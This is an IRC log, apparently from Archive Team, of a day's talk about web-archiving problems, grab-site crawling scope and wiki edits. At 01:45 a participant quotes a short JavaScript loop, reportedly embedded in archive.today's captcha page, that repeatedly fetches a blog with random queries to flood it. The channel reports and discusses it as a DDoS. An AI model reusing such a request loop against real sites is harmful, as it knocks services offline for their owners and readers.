00:00:02sec^nd quits [Remote host closed the connection]
00:00:28sec^nd (second) joins
00:02:52Sk1d joins
00:04:46Dada quits [Remote host closed the connection]
00:10:51BornOn420 quits [Ping timeout: 272 seconds]
00:12:47fangfufu quits [Quit: ZNC 1.9.1+deb2+b3 - https://znc.in]
00:13:18fangfufu joins
00:14:02sec^nd quits [Remote host closed the connection]
00:14:20sec^nd (second) joins
00:18:17etnguyen03 (etnguyen03) joins
00:42:20hamouda9 quits [Client Quit]
00:49:05Sk1d quits [Read error: Connection reset by peer]
00:49:06etnguyen03 quits [Remote host closed the connection]
00:55:02useretail quits [Remote host closed the connection]
00:55:41etnguyen03 (etnguyen03) joins
00:57:52useretail joins
00:57:57BornOn420 (BornOn420) joins
01:18:05<pabs>klea: re Moin, hackily with AB, or someone could write some code to generate an !ao list https://wiki.archiveteam.org/index.php/MoinMoin#ArchiveBot
01:32:13<pabs>justauser: e164.arpa results https://transfer.archivete.am/8iNc3/e164.arpa-pabs-scrape.txt
01:32:13<eggdrop>inline (for browser viewing): https://transfer.archivete.am/inline/8iNc3/e164.arpa-pabs-scrape.txt
01:35:42<klea>aaa, pita
01:36:12<@JAA>I have a partial implementation of scripts to make it easier, need to finish those.
01:36:16<@JAA>Also, #wikiteam
01:37:48<pabs>justauser: re archive.today, do we know what triggers the captchas?
01:39:41<Yakov>happens everytime when trying to save a capture with no cookies/new session
01:40:32<Yakov>sometimes happens when searching or when going to a capture
01:42:04<pabs>huh, it does now. I remember not having captchas when saving before
01:43:12<Yakov>pretty sure it always did, just if you solved it in the past (whether it be from going to a capture or even viewing a capture previously) it might not show
01:43:44<pabs>hmm
01:45:09<Yakov>anyways they've well aware people know about the DDoS script yet they still keep it, in fact they've mutated the DDoS script since the HN post to now use Math.random instead of Date().getTime()
01:45:41<Yakov>https://news.ycombinator.com/item?id=46624740 <-- previous script, current script: setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300);`
01:47:21<pokechu22>hmm, I didn't see the script or any network traffic when I looked for it yesterday; maybe they removed it temporarily?
01:48:54<Yakov>i noticed that too, however i noticed the script still in the html. then i realized ublock and most adblockers now block it as mentioned in the recent gyrovague blog post
01:49:29<Yakov>https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/ ctrl+f "ublock"
01:50:32<pokechu22>I saw that but assumed it would still show up in the developer console (as blocked). I *think* I also looked in the HTML and didn't see the script, but might have just missed it
01:51:07<Yakov>I always assumed it would be blocked and i'm confused as well however i only glimpsed over it but i know it was definitely there
01:51:13<Yakov>s/always/also/
01:52:33<Yakov>ublock might not be doing it (just) on a network level? Chromium with 0 extensions and the requests actually do go through and show up
01:55:51<Yakov>https://pastebin.com/X2aW7J1G this is the html for the captcha page for anyone who is curious (only thing i changed was i redacted my IP that was in an html comment from the server)
01:55:53<@JAA>I don't remember *not* seeing a captcha on URL submission (without a recent previous submission).
02:08:02<steering>Yakov: pastebin hid your paste
02:08:05<steering>pastebin--
02:08:07<eggdrop>[karma] 'pastebin' now has -1 karma!
02:08:24<Yakov>"Pending Moderation" that happened fast
02:08:31<steering>doxx and malware: yes
02:08:33<steering>html dump: no
02:09:07<Yakov>alternative: https://transfer.archivete.am/64GbF/archive.today%20challenge%20html.html
02:09:07<eggdrop>inline (for browser viewing): https://transfer.archivete.am/inline/64GbF/archive.today%20challenge%20html.html
02:10:07<Yakov>wait inline is actually running the html
02:10:16<steering>yeah it does that
02:10:29<Yakov>i was really concerned for a second when i noticed a fake cloudflare challenge
02:10:47<Yakov>lol and it's doin the requests https://img.yakov.cloud/gXuKY.png
02:12:07<steering>yeah i was confused by view source not working
02:12:11<steering> window.history.pushState('/', '', '/');
02:12:21steering shakes fist at browsers for allowing that to break view source
02:12:37<steering>(or just for allowing it at all, ugh)
02:15:16<steering>https://transfer.archivete.am/inline/bctfb/archive.today.challenge.html uploaded as text/plain
02:15:39steering shakes fist at transfer for not including a newline on the end of the output
02:20:39<steering>aaaaaaah I wish e164 was a thing
02:26:59<pabs>!tell egallager re that wesnoth forums post, there are a few non-404 .sf2 files on IA, found using the little-things ia-cdx-search tool https://transfer.archivete.am/cqUq9/www.freesf2.com-non-404-sf2-files.txt
02:26:59<eggdrop>[tell] ok, I'll tell egallager when they join next
02:28:32<Yakov>i really wish we could recursively archive https://www.mobileread.com/ forums, if someone can figure it out that would be great
02:29:09<Yakov>somehow AB got 403s on forumdisplay.php but works fine in browser? 🤷‍♂️
02:35:12<pabs>hmm, wget with no UA doesn't get a 403
02:37:39<Yakov>it was last done on job id 15ypiav9wiw4v40ktcxoy8dhk
02:38:07<Yakov>20:58:04 <@pokechu22> https://www.mobileread.com/forums/member.php is restricted, but it also got 403s on forumdisplay.php
02:38:39<Yakov>s/done/queued and aborted/
02:39:13<pabs>might be IP reputation, I got 200 regardless of UA with curl, using all the AB UAs
02:39:26<Yakov>We can try again then
03:28:41michaelblob quits [Quit: yoop]
03:29:20michaelblob joins
04:02:48etnguyen03 quits [Quit: Konversation terminated!]
04:03:23etnguyen03 (etnguyen03) joins
04:15:54etnguyen03 quits [Remote host closed the connection]
04:19:30<pokechu22>OK, yeah, I can confirm archive.today still does that, and the history modification probably is part of the problem. The way archive.today handles failed jobs is annoying in general - it makes it easy to forget what the original URL was
04:19:47<pokechu22>and it doesn't show up in f12 at all
04:26:42chunkynutz60 quits [Quit: The Lounge - https://thelounge.chat]
04:26:55chunkynutz60 joins
04:45:23Kotomind joins
04:52:58DogsRNice quits [Read error: Connection reset by peer]
04:53:57sec^nd quits [Remote host closed the connection]
04:54:30sec^nd (second) joins
05:03:27SootBector quits [Remote host closed the connection]
05:04:26SootBector (SootBector) joins
05:04:46n9nes quits [Ping timeout: 256 seconds]
05:05:13n9nes joins
05:58:31Island quits [Read error: Connection reset by peer]
06:03:37chunkynutz60 quits [Ping timeout: 272 seconds]
06:09:05nexussfan quits [Quit: Konversation terminated!]
06:22:28ArchivalEfforts quits [Quit: https://quassel-irc.org - Chat comfortably. Anywhere.]
06:23:39ArchivalEfforts joins
06:34:35Sluggs quits [Excess Flood]
06:39:35chunkynutz60 joins
06:39:44Sluggs (Sluggs) joins
06:43:14Guest quits [Read error: Connection reset by peer]
06:43:16Guest joins
06:43:22midou quits [Ping timeout: 256 seconds]
06:50:14barry quits [Remote host closed the connection]
06:50:50barry joins
06:51:32sec^nd quits [Remote host closed the connection]
06:52:02sec^nd (second) joins
07:16:08flotwig quits [Read error: Connection reset by peer]
07:16:21flotwig joins
07:24:04sec^nd quits [Ping timeout: 256 seconds]
07:27:58sec^nd (second) joins
07:36:18Washuu quits [Quit: Ooops, wrong browser tab.]
08:35:09sec^nd quits [Remote host closed the connection]
08:35:35sec^nd (second) joins
09:34:31nathang2184 quits [Ping timeout: 272 seconds]
09:38:49midou joins
09:40:43nathang2184 joins
09:45:21twiswist_ quits [Read error: Connection reset by peer]
09:45:35twiswist_ (twiswist) joins
10:21:15oxtyped quits [Read error: Connection reset by peer]
10:28:20oxtyped joins
10:29:32<triplecamera|m>I've been tinkering with grab-site these days. I'd like to archive <https://pdos.csail.mit.edu/6.828/{2003..2025}/>, which is served by Apache.
10:30:50<triplecamera|m>Apache has a feature: When you access a directory without the index file, Apache lists all files under that directory. This enables the discovery of hidden files (files without links pointing to them).
10:32:17<triplecamera|m>I hope that whenever wpull visits a page, it automatically pushes its parent directory into the queue. Is this possible to achieve?
11:09:08oxtyped quits [Ping timeout: 256 seconds]
11:37:00ichdasich quits [Remote host closed the connection]
11:40:26oxtyped joins
12:00:03Bleo182600722719623455222 quits [Quit: The Lounge - https://thelounge.chat]
12:02:52Bleo182600722719623455222 joins
12:10:53APOLLO03 quits [Quit: .]
12:13:11APOLLO03 joins
12:18:23Washuu joins
12:24:31Dada joins
13:00:23marcmarcos joins
13:09:45<justauser>pabs: I think everything interesting is on our wiki. Always on save, "bad" IPs get it on the first request, lasts for 5 minutes.
13:09:46<justauser>triplecamera|m: grab-site/AB won't climb up the directories on their own; this had to be implemented separately during SFDW project.
13:18:20Arcorann__ quits [Ping timeout: 256 seconds]
13:24:25marcmarcos quits [Ping timeout: 272 seconds]
13:30:32<cruller>You can climb the directories by executing `grab-site --which-wpull-command` and removing `--no-parent` from the output. However, I don't think this is what triplecamera wants to do.
13:32:10PC quits [Remote host closed the connection]
13:32:23PC (PC) joins
13:40:58<cruller>Moreover, with this method, all URLs sharing the same FQDN as the seeds end up within the scope, IIUC.
13:44:54<masterx244|m>i wonder if a ignore could be abused to ignore anything that is not under the /6.828 top level folder
13:45:40<cruller>--hostnames or similar option restricts the scope, but this also affects requisites.
13:48:18<masterx244|m>5 regexes should be enough to exclude anything outside of the folder. .edu/[^6] .edu/6[^.] .edu/6.[^8] and so on until where the urls divert
13:48:50<masterx244|m>requisites need a run through the database on ignored urls and then a --1 to fetch them without recursion
13:49:10<justauser>grab-site doesn't keep a DB of ignored URLs IIRC.
13:49:32<masterx244|m>it does :P, its inside wpull database
13:50:03<masterx244|m>i absued that back for the imgur hunting, crawl site and have a ignore matching everything except the target domain, afterwards wpull db to urllist and then grep
13:58:23marcmarcos joins
14:01:36<marcmarcos>exit
14:01:44marcmarcos quits [Client Quit]
14:16:59lukash984 quits [Ping timeout: 272 seconds]
14:28:01<cruller>In any case, unless "Index of" pages are linked from regular pages, it's difficult to automatically push them into the queue, right?
14:29:56lukash984 joins
14:30:08<justauser>Not that hard, but needs a custom script. SFDW had one.
14:30:33<cruller>You might be able to do it using “--plugin-script”. But rather than that, I think it's easier to manually create a URL list from a 1st crawl and then perform a 2nd crawl.
14:30:54<cruller>ah yes, custom script.
14:36:24<cruller>BTW, in general, URLs that are in-scope but require out-of-scope resources for discovery are very troublesome.
14:38:57Island joins
14:42:28<cruller>I have no choice but to give up on orphan urls, but it's frustrating to miss urls that could be found depending on crawling rules.
14:48:01oxtyped quits [Ping timeout: 272 seconds]
14:51:11Kotomind quits [Ping timeout: 272 seconds]
14:56:33<h2ibot>Justauser edited Uncyclopedia (+621, Added dump links): https://wiki.archiveteam.org/?diff=60413&oldid=59310
14:57:58oxtyped joins
14:58:52<masterx244|m>koichi: like said: 2-stage crawl first one to get all folders that are known and then pulling the folder indexes and then processing the indexes to check if there are more URLs hidden
15:00:42<jodizzle>"Washington Post to make ‘significant’ cuts": https://www.semafor.com/article/02/04/2026/washington-post-to-make-significant-cuts
15:01:22<jodizzle>I imagine the Washington Post is thoroughly archived in several places, but just FYI.
15:19:54petrichor quits [Quit: ZNC 1.10.1 - https://znc.in]
15:41:18DogsRNice joins
16:05:38<pabs>pokechu22: re failed archive.today jobs, I found today that in firefox at least that hovering over the tab gives you a truncated original URL and typing that into the URL bar gets you the full URL from history
16:06:50Ryz2 quits [Quit: Ping timeout (120 seconds)]
16:07:01Ryz2 (Ryz) joins
16:07:39<pabs>jodizzle: I think WaPo is pretty hard to archive, ISTR AB gets errors
16:10:39petrichor (petrichor) joins
16:38:15Guest58 quits [Quit: Textual IRC Client: www.textualapp.com]
16:45:57Washuu quits [Quit: Ooops, wrong browser tab.]
17:40:42crullerIRC quits [Ping timeout: 256 seconds]
17:41:56crullerIRC joins
17:46:48cyanbox_ joins
17:47:14cyanbox_ quits [Read error: Connection reset by peer]
17:49:47cyanbox quits [Ping timeout: 272 seconds]
17:57:31Juest quits [Read error: Connection reset by peer]
18:00:56Juest (Juest) joins
18:17:59<h2ibot>Manu edited Distributed recursive crawls (+69, Candidates: Add www.defence.go.ug): https://wiki.archiveteam.org/?diff=60414&oldid=60181
18:27:08michaelblob quits [Quit: yoop]
18:30:12michaelblob joins
18:32:36Sk1d joins
18:39:44nine quits [Quit: See ya!]
18:39:57nine joins
18:39:57nine quits [Changing host]
18:39:57nine (nine) joins
18:43:03<h2ibot>Manu edited Discourse/archived (+89, Queued https://chiahpa.be/): https://wiki.archiveteam.org/?diff=60415&oldid=60387
18:44:03<h2ibot>Manu edited Discourse/archived (+103, pokechu22 queued discussions.scouting.org): https://wiki.archiveteam.org/?diff=60416&oldid=60415
18:46:03<h2ibot>Manu edited Discourse/archived (+96, Queued discuss.ipfs.tech): https://wiki.archiveteam.org/?diff=60417&oldid=60416
18:49:04<h2ibot>Manu edited Discourse/archived (+100, Queued forums.rockylinux.org): https://wiki.archiveteam.org/?diff=60418&oldid=60417
18:51:04<h2ibot>Manu edited Discourse/archived (+89, Queued ziggit.dev): https://wiki.archiveteam.org/?diff=60419&oldid=60418
18:53:45Kabaya quits [Ping timeout: 272 seconds]
19:01:59Sk1d quits [Ping timeout: 272 seconds]
19:12:10iPwnedYourIOTSmartdog quits [Quit: Ping timeout (120 seconds)]
19:12:30iPwnedYourIOTSmartdog joins
19:51:21Wohlstand (Wohlstand) joins
19:59:52Wohlstand quits [Client Quit]
20:13:24ThreeHM quits [Quit: WeeChat 4.8.0]
20:14:31ThreeHM (ThreeHeadedMonkey) joins
20:17:40fetcher quits [Ping timeout: 256 seconds]
20:23:06fetcher joins
20:39:41lukash984 quits [Quit: The Lounge - https://thelounge.chat]
20:41:14lukash984 joins
21:35:00Sk1d joins
21:42:13fetcher quits [Ping timeout: 272 seconds]
21:43:38fetcher joins
22:01:22fetcher quits [Ping timeout: 256 seconds]
22:06:42fetcher joins
22:17:32flotwig quits [Quit: ZNC - http://znc.in]
22:19:43flotwig joins
22:21:29fetcher quits [Ping timeout: 272 seconds]
22:23:10fetcher joins
22:30:22Arcorann__ joins
22:38:41flotwig quits [Client Quit]
22:48:43n9nes quits [Ping timeout: 272 seconds]
22:49:50n9nes joins
22:58:02flotwig joins
23:01:51flotwig quits [Client Quit]
23:02:09Dada quits [Remote host closed the connection]
23:08:06flotwig joins
23:11:51flotwig quits [Client Quit]
23:15:34flotwig joins
23:16:32nexussfan (nexussfan) joins
23:38:25Arcorann__ quits [Read error: Connection reset by peer]
23:39:28Arcorann joins
23:49:02Sk1d quits [Ping timeout: 256 seconds]